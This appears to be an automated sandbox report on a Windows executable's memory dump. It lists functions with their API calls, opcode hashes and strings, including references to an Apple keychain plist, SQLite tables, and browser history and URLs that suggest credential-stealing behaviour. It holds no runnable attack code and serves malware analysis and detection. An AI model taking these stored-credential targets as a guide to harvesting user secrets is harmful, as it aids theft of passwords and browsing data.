Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 898d8e9d52820eb96ce10e2226b5f96aabaab06ffaecd95ecc0993478c84b991
Instruction ID: d0afff18851916bdc62762cc26ce26f97abfa6c0527030a4abc257fe2447681f
Opcode Fuzzy Hash: 898d8e9d52820eb96ce10e2226b5f96aabaab06ffaecd95ecc0993478c84b991
Instruction Fuzzy Hash: 2F114F712046019FE328DF1DC881A27F7E5EFD9304B21892EE59A97386DB39E802CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00413D78, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413DA4

Part of subcall function 004089E1: _snwprintf.MSVCRT ref: 00408A26
Part of subcall function 004089E1: memcpy.MSVCRT ref: 00408A36

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00413DCD
memset.MSVCRT ref: 00413DD7
GetPrivateProfileStringW.KERNEL32 ref: 00413DF9

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 4701140641528281e6a2f2a601d8238aa5be9a8f71d281e8a9d64cb715560d8d
Instruction ID: e0c1f09ad2cb5d60bcfcc92858fd4079171207d9a16d9363f081e68af551c4db
Opcode Fuzzy Hash: 4701140641528281e6a2f2a601d8238aa5be9a8f71d281e8a9d64cb715560d8d
Instruction Fuzzy Hash: 4D1165B2500129BFEF11AF64DC06EDE7B79EF44711F10006AFB05B2151EA359A608F9D

Uniqueness

Uniqueness Score: -1.00%

Function 004146B4, Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 004146C4
SHBrowseForFolderW.SHELL32(?), ref: 004146F6
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0041470A
wcscpy.MSVCRT ref: 0041471D

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: cb6a9e2cdf5430a829d0da304ac5e0abe1f2fc1a776887efdb875fa7bb300fe9
Instruction ID: 097f193ff7923ae7587a5e446372f032271e9f174675921af37de08819f90ac7
Opcode Fuzzy Hash: cb6a9e2cdf5430a829d0da304ac5e0abe1f2fc1a776887efdb875fa7bb300fe9
Instruction Fuzzy Hash: EC11FAB5900208AFDB00DFA9D988AEEB7FCFB49304F10406AE515E7240D738DB45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0042F6EF, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0042F72A
memset.MSVCRT ref: 0042F734
memcpy.MSVCRT ref: 0042F75F

Strings

sqlite_master, xrefs: 0042F702

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$memset
String ID: sqlite_master
API String ID: 438689982-3163232059
Opcode ID: c646f38e99a0b25c0d94209a59a7168cae4c1a9a59a360b2711f92080c37e354
Instruction ID: df29f02e372fce164f73cef38905b10b73feda933693282389fd2907aeed520f
Opcode Fuzzy Hash: c646f38e99a0b25c0d94209a59a7168cae4c1a9a59a360b2711f92080c37e354
Instruction Fuzzy Hash: 8B01F572900618BAEB11BBA0CC42FDEB77DFF45315F50005AF60062042DB79AA148B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7F0, Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419

_snwprintf.MSVCRT ref: 0040E81D
SendMessageW.USER32(?,0000040B,00000000,?), ref: 0040E882

Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE

_snwprintf.MSVCRT ref: 0040E848
wcscat.MSVCRT ref: 0040E85B

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
String ID:
API String ID: 822687973-0
Opcode ID: f595f7851fd5ecf50e789f2e31413ad2f48e9a2df967e8378ccfd76600fbb0fc
Instruction ID: fc9a9cbfa579f1f3c21001c0e8c570231a458ca756af8d40dec707b0d2905b79
Opcode Fuzzy Hash: f595f7851fd5ecf50e789f2e31413ad2f48e9a2df967e8378ccfd76600fbb0fc
Instruction Fuzzy Hash: 540188B650070466F720F7A6DC86FAB73ACDB80704F14047AB719F21C2D679A9514A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00416D4F, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74785970,?,00416E7A,?), ref: 00416D6D
malloc.MSVCRT ref: 00416D74
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74785970,?,00416E7A,?), ref: 00416D93
free.MSVCRT(00000000,?,74785970,?,00416E7A,?), ref: 00416D9A

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$freemalloc
String ID:
API String ID: 2605342592-0
Opcode ID: 6473b6ae2363bac8fe3278054bbb67e2d8efa675f45e1cfdc60fa0bc066547d8
Instruction ID: bcab52b9ccbc4c9bc02d63d2584d5636d902a6cb4a382b6ea3df8204de1a5a00
Opcode Fuzzy Hash: 6473b6ae2363bac8fe3278054bbb67e2d8efa675f45e1cfdc60fa0bc066547d8
Instruction Fuzzy Hash: 9DF089B260E22D7F7B102A75ACC0D7BBB9CDB862FDB21072FF514A1190D9199C015675

Uniqueness

Uniqueness Score: -1.00%

Function 004081EA, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 004081F8
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00408210
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00408226
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00408249

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 381a5bbb51054e29776615c9d78b7fadc6b93f74ad2d14be58dfbd0a9df3dec6
Instruction ID: eb915db23c4b1ca38ea3c1988d88bb83aba39799d6a265b66449fd7df9afb7a9
Opcode Fuzzy Hash: 381a5bbb51054e29776615c9d78b7fadc6b93f74ad2d14be58dfbd0a9df3dec6
Instruction Fuzzy Hash: 10F06975A0050CBFDB018F948E81CAFBBB9EB49784B2000BAF504E6150D6709E01AA61

Uniqueness

Uniqueness Score: -1.00%

Function 00417479, Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00417496
UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004174B6
LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 004174C2
GetLastError.KERNEL32 ref: 004174D0

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$ErrorLastLockUnlockmemset
String ID:
API String ID: 3727323765-0
Opcode ID: 4810f114b558b10b38af4f71b0c7c6b165b1adf4af59189c3dccd4a982aa45c9
Instruction ID: 68256e963451342af1775745e88af25fe573ff9f394a0ba2c0bbd214266e5fb2
Opcode Fuzzy Hash: 4810f114b558b10b38af4f71b0c7c6b165b1adf4af59189c3dccd4a982aa45c9
Instruction Fuzzy Hash: 7701F435504608BFDB219FA0DC84D9B7FBCFB80705F20843AF942D6050D6349984CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401C64

Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592

wcslen.MSVCRT ref: 00401C7D
wcslen.MSVCRT ref: 00401C8B

Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED

Strings

Apple Computer\Preferences\keychain.plist, xrefs: 00401C77, 00401C7C, 00401CA4

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$FolderPathSpecialmemsetwcscatwcscpy
String ID: Apple Computer\Preferences\keychain.plist
API String ID: 3183857889-296063946
Opcode ID: 6247019291f7f29928cfc72ffb34b103c0827717099c0caebcdb4204c0bdf711
Instruction ID: eecd7d3c3de4f02ea7dbe6204318003872b6068ab845989257e2c34d03a92ed5
Opcode Fuzzy Hash: 6247019291f7f29928cfc72ffb34b103c0827717099c0caebcdb4204c0bdf711
Instruction Fuzzy Hash: 08F0F9B250531866FB20A755DC8AFDA73AC9F01314F2001B7E914E20C3FB7CD944469D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CEF9, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040CF1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,00445ADC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040CF37
strlen.MSVCRT ref: 0040CF49
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040CF5A

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: 6de95bbd86e8c5c66f1a6cb16b855a894458dc702525011a0bbc2a07e71c4aeb
Instruction ID: 14800c8a4aa59548f5ab429dc5ca7c2185fd5422b2c87da3b8dfa48c6c6ad4f5
Opcode Fuzzy Hash: 6de95bbd86e8c5c66f1a6cb16b855a894458dc702525011a0bbc2a07e71c4aeb
Instruction Fuzzy Hash: 13F01DB780122CBFFB059B94DCC9EEB776CDB09254F0001A6B709E2052DA749E448BB8

Uniqueness

Uniqueness Score: -1.00%

Function 0040CE8A, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040CEAF
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040CECC
strlen.MSVCRT ref: 0040CEDE
WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040CEEF

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: 9c577301d423554223bdd3630099943bbc335e058c45f1b75860cbc1b2ab4647
Instruction ID: 5ca945b9895027beb3426ea3ebb999d168a71141a618eb4a8136c4c05ef02c5a
Opcode Fuzzy Hash: 9c577301d423554223bdd3630099943bbc335e058c45f1b75860cbc1b2ab4647
Instruction Fuzzy Hash: 40F062B680152C7FEB81A794DC81EEB776CEB05258F0041B2B749D2041DD349E084F7C

Uniqueness

Uniqueness Score: -1.00%

Function 00413A55, Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 0040840D: memset.MSVCRT ref: 0040842C
Part of subcall function 0040840D: GetClassNameW.USER32 ref: 00408443
Part of subcall function 0040840D: _wcsicmp.MSVCRT ref: 00408455

SetBkMode.GDI32(?,00000001), ref: 00413A7C
SetBkColor.GDI32(?,00FFFFFF), ref: 00413A8A
SetTextColor.GDI32(?,00C00000), ref: 00413A98
GetStockObject.GDI32(00000000), ref: 00413AA0

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
String ID:
API String ID: 764393265-0
Opcode ID: 16e31c24aafdd867e9f11d81aef655d32ec4149ba1a8bcf71b06e6c70f8613c6
Instruction ID: 110bd5b637e4d79b17592fdcf208372bccb43cad252910099e33a416a39d1a4b
Opcode Fuzzy Hash: 16e31c24aafdd867e9f11d81aef655d32ec4149ba1a8bcf71b06e6c70f8613c6
Instruction Fuzzy Hash: 4DF0C839100208BBCF216F60DC05ACE3F21AF05362F104136F914541F2CB759A90DB4C

Uniqueness

Uniqueness Score: -1.00%

Function 00408D10, Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00408D2C
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 00408D3C
SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 00408D4B

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$System$File$LocalSpecific
String ID:
API String ID: 979780441-0
Opcode ID: d8f3a09722eadbc74da9c95b8a3510df0f65f7c1f1d0afca8fe4e111664d8614
Instruction ID: ec3377692345dfa8f7b5f00acb1c953adbf394747b85e28386a557f9ea6599fc
Opcode Fuzzy Hash: d8f3a09722eadbc74da9c95b8a3510df0f65f7c1f1d0afca8fe4e111664d8614
Instruction Fuzzy Hash: F4F05E769005199BEF119BA0DC49BBFB3FCBF1670AF008529E052E1090DB74D0048B64

Uniqueness

Uniqueness Score: -1.00%

Function 004116B2, Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004116CC
memcpy.MSVCRT ref: 004116DE
GetModuleHandleW.KERNEL32(00000000), ref: 004116F1
DialogBoxParamW.USER32 ref: 00411705

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: a05812b97bd1c831ce7d974adc3378230abb1617476c2fccf6c1e9608279f8eb
Instruction ID: a5b74f8db5ede7a3d830d9ef30c1a68d0a9fd07d2d047c5f1f3455979569a65d
Opcode Fuzzy Hash: a05812b97bd1c831ce7d974adc3378230abb1617476c2fccf6c1e9608279f8eb
Instruction Fuzzy Hash: 6CF08231680710BBE751AF68BC06F467A90A786B93F200427F700A51E2D2F98591CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00404C2D, Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00404C44

Part of subcall function 0041473D: LoadLibraryW.KERNEL32(shlwapi.dll,770B48C0,?,00404C4C,00000000), ref: 00414746
Part of subcall function 0041473D: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00414754
Part of subcall function 0041473D: FreeLibrary.KERNEL32(00000000,?,00404C4C,00000000), ref: 0041476C

GetDlgItem.USER32 ref: 00404C56
GetDlgItem.USER32 ref: 00404C68
GetDlgItem.USER32 ref: 00404C7A

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Item$Library$AddressFreeLoadProc
String ID:
API String ID: 2406072140-0
Opcode ID: da5f3edd2f60ef32041746d78debef195ee365f8658758de0d32d5ce3718fae6
Instruction ID: 228af19f1fcbab99cdef25afc198749965fa335a60b9bcf03d324973c33eddf9
Opcode Fuzzy Hash: da5f3edd2f60ef32041746d78debef195ee365f8658758de0d32d5ce3718fae6
Instruction Fuzzy Hash: C1F01CB54047016BDA313F72CC09D5BBAADEFC1318F020D3EB1A1661E1CBBD94428A58

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF98, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 0040CFDA
wcschr.MSVCRT ref: 0040CFE8

Part of subcall function 00408FA6: wcslen.MSVCRT ref: 00408FC2
Part of subcall function 00408FA6: memcpy.MSVCRT ref: 00408FE5

Strings

", xrefs: 0040D024

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcschr$memcpywcslen
String ID: "
API String ID: 1983396471-123907689
Opcode ID: 10fcbf9e5481758e0dfe22ca6cc4b0137c7973d9f08c313bebbe16306d28857a
Instruction ID: cb92cf76e860540842cf0149dc84745c0fdf0d5674f0ab6313b6b46cd67416c3
Opcode Fuzzy Hash: 10fcbf9e5481758e0dfe22ca6cc4b0137c7973d9f08c313bebbe16306d28857a
Instruction Fuzzy Hash: 5331B371904104EFDF10EFA5D8419EEB7B5EF44328F20416FE854B71C2DB7C9A468A58

Uniqueness

Uniqueness Score: -1.00%

Function 00408BAA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00408BD6
memcpy.MSVCRT ref: 00408C22

Strings

ZD, xrefs: 00408BAA

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpywcschr
String ID: ZD
API String ID: 2424118378-3587482827
Opcode ID: cab20acd61bf2aeda623c70c5b61bfb8dcf6f4394f0840f81abff6233d4b2f5c
Instruction ID: bc5ff3c8a32915e0c271f67cda952c5327785ed0a9ceb032124e0645629a4555
Opcode Fuzzy Hash: cab20acd61bf2aeda623c70c5b61bfb8dcf6f4394f0840f81abff6233d4b2f5c
Instruction Fuzzy Hash: 6B21D372815615AFEB259F18C6809BA73B4EB55354B10003FECC1E73D1EF78EC9186A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040A19F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 004089BB: SetFilePointer.KERNEL32(0040A46B,?,00000000,00000000,?,0040A271,00000000,00000000,?,00000020,?,0040A401,?,?,*.*,0040A46B), ref: 004089C8

_memicmp.MSVCRT ref: 0040A1B9
memcpy.MSVCRT ref: 0040A1D0

Strings

URL , xrefs: 0040A1B3

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer_memicmpmemcpy
String ID: URL
API String ID: 2108176848-3574463123
Opcode ID: 0ab65471aa39f3e32cca0cb723868807121227734642166b6a1d255f25c2e27e
Instruction ID: 99369b2f7b4a62638f95efb923bbf95607b210eae314fb40be60fbcdcdd136bc
Opcode Fuzzy Hash: 0ab65471aa39f3e32cca0cb723868807121227734642166b6a1d255f25c2e27e
Instruction Fuzzy Hash: 8E11E371200304BBEB11DF65CC05F5F7BA8AF91348F00407AF904AB391EA39DA20C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 004089E1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00408A26
memcpy.MSVCRT ref: 00408A36

Strings

%2.2X , xrefs: 00408A1B

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: d16808a51bbc7474834844d6a398450cf8754e6776392b16b10eb0a45586ee87
Instruction ID: da81b6977c0b6fb050ee50f61be4767a81b1db5370a865e3ffb8ab5306406039
Opcode Fuzzy Hash: d16808a51bbc7474834844d6a398450cf8754e6776392b16b10eb0a45586ee87
Instruction Fuzzy Hash: D311A132A00208BFEB40DFE8C986AAF73B8FB45714F10843BED55E7141D6789A558F95

Uniqueness

Uniqueness Score: -1.00%

Function 004174E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,004176FC,?,00000000), ref: 00417518
CloseHandle.KERNEL32(?), ref: 00417524

Strings

NA, xrefs: 00417503

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandleUnmapView
String ID: NA
API String ID: 2381555830-2562218444
Opcode ID: d40bf1f6c7c19c9d983791adfa5e9ad4e6f6ebbcc0410757e5a5cd4d668ca904
Instruction ID: 5a1a322b0db6f4624e604a7b594929ce6c45ce98bd99ef11bc86fd7bf5bcef0d
Opcode Fuzzy Hash: d40bf1f6c7c19c9d983791adfa5e9ad4e6f6ebbcc0410757e5a5cd4d668ca904
Instruction Fuzzy Hash: 7D11BF36504B10EFC7329F28D944A9777F5FF40752B40092EE94296A61D738F981CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE5E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D

GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040AE7C

Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542

Part of subcall function 0040897D: ReadFile.KERNEL32(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994

Part of subcall function 00409064: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401DEE,00000000,00000001,00000000), ref: 0040907D
Part of subcall function 00409064: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401DEE,00000000,00000001,00000000), ref: 004090A2

CloseHandle.KERNEL32(?,?,000000FF,00000000), ref: 0040AECC

Part of subcall function 00409552: ??3@YAXPAX@Z.MSVCRT ref: 00409559

Strings

{@, xrefs: 0040AE5E

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
String ID: {@
API String ID: 2445788494-1579578673
Opcode ID: 0b312874332654f14ac278eaa5fe32861660f9d9efcdc11683d7636b2732440c
Instruction ID: c5e992bc26eaba96ccce0a59eaf6c8ec24c3530ff69697df2342695e73c728e4
Opcode Fuzzy Hash: 0b312874332654f14ac278eaa5fe32861660f9d9efcdc11683d7636b2732440c
Instruction Fuzzy Hash: A1113376804208AFCB01AF69DC45CDA7B78EE05364751C27BF515A7192D6349E04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D1F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040D21F
_snwprintf.MSVCRT ref: 0040D23F

Strings

%%-%d.%ds , xrefs: 0040D214

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintf
String ID: %%-%d.%ds
API String ID: 3988819677-2008345750
Opcode ID: 483dcaac6a08b5d03ce4074c4c19aa481c1388c04e02163b2fa0e4fc7d7ec376
Instruction ID: fa2a5c48b8b1081f9110b67312fe06c807ccf1e61c825d072a06322f14435401
Opcode Fuzzy Hash: 483dcaac6a08b5d03ce4074c4c19aa481c1388c04e02163b2fa0e4fc7d7ec376
Instruction Fuzzy Hash: 2D01B171600304AFD711EF69CC82E5ABBA9FF8C714B10442EFD46A7292C679F851CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00408907, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetSaveFileNameW.COMDLG32(?), ref: 00408956
wcscpy.MSVCRT ref: 0040896D

Strings

X, xrefs: 0040893B

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileNameSavewcscpy
String ID: X
API String ID: 3080202770-3081909835
Opcode ID: ebc7cc994b1ae799fe580d521e5066964324ca7fbd572096a573d52571a50e6b
Instruction ID: 302039dcaac94884f1c4397820c578514485f3c1708042d42c96f5da00a98a83
Opcode Fuzzy Hash: ebc7cc994b1ae799fe580d521e5066964324ca7fbd572096a573d52571a50e6b
Instruction Fuzzy Hash: 3301D3B1E002499FDF01DFE9D9847AEBBF4AB08319F10402EE855E6280DB789949CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00408FFD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 0040900C
_memicmp.MSVCRT ref: 0040903A

Strings

History, xrefs: 00409006, 0040900B, 00409038

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memicmpwcslen
String ID: History
API String ID: 1872909662-3892791767
Opcode ID: e276876a3a660070092f4bdc0da4bda60b27ab1e2c5d0f7fe8a34c2cfdf5cdf0
Instruction ID: 6d3e5e79fb5ba3dc045185e0f7d8bb4044f56437cf7f7bc11c2c4fdfd27bba80
Opcode Fuzzy Hash: e276876a3a660070092f4bdc0da4bda60b27ab1e2c5d0f7fe8a34c2cfdf5cdf0
Instruction Fuzzy Hash: D1F0A4721086019BD210EA298841A6BF7E8DB923A8F11053FF89192283DB3DDC5586A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF8E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BFA6
SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040BFD5

Strings

", xrefs: 0040BFCE

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessageSendmemset
String ID: "
API String ID: 568519121-123907689
Opcode ID: 8974f3925887516f6d0a900228c109d4e68bc67ff3c39d3e2085c907346f7644
Instruction ID: 52ec7358bf223f21f0f54ed804b07356b6d9a4f052c0f3137058475af9765f6b
Opcode Fuzzy Hash: 8974f3925887516f6d0a900228c109d4e68bc67ff3c39d3e2085c907346f7644
Instruction Fuzzy Hash: 66016D75900206ABDB209F5ACC45EAFB7F8FF85745F00802AE855E7281E7349945CF79

Uniqueness

Uniqueness Score: -1.00%

Function 004018F4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,?,?,?,?,0040F3B0,?,General,?,?,?,?,?,00000000,00000001), ref: 0040191D
memset.MSVCRT ref: 00401930

Strings

WinPos, xrefs: 00401943

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PlacementWindowmemset
String ID: WinPos
API String ID: 4036792311-2823255486
Opcode ID: 531d41ac9e6cbf47dd5b0ef28c7d94a06efd8350b381f438b609c2e10ada3800
Instruction ID: ca976ba5ed3f83ef93de4c78b9b818d0dc8f3eea61e23acacabb71661926745e
Opcode Fuzzy Hash: 531d41ac9e6cbf47dd5b0ef28c7d94a06efd8350b381f438b609c2e10ada3800
Instruction Fuzzy Hash: 9AF012B0600205EFEB14DF95D899F5A77A8EF04700F54017AF90ADB2D1DBB89900CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC29, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BC4D
LoadStringW.USER32(X1E,00000000,?,00001000), ref: 0040BC65

Part of subcall function 0040B93B: memset.MSVCRT ref: 0040B94E
Part of subcall function 0040B93B: _itow.MSVCRT ref: 0040B95C

Strings

X1E, xrefs: 0040BC62

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$LoadString_itow
String ID: X1E
API String ID: 2363904170-1560614071
Opcode ID: 7f112a53103efb0d1130b80e122edadfff3b355a72e37d03c438b452bd6af500
Instruction ID: f380a03a7eecdd41986674abf89776040d4e37bafc66abb46cfa381fa5204df8
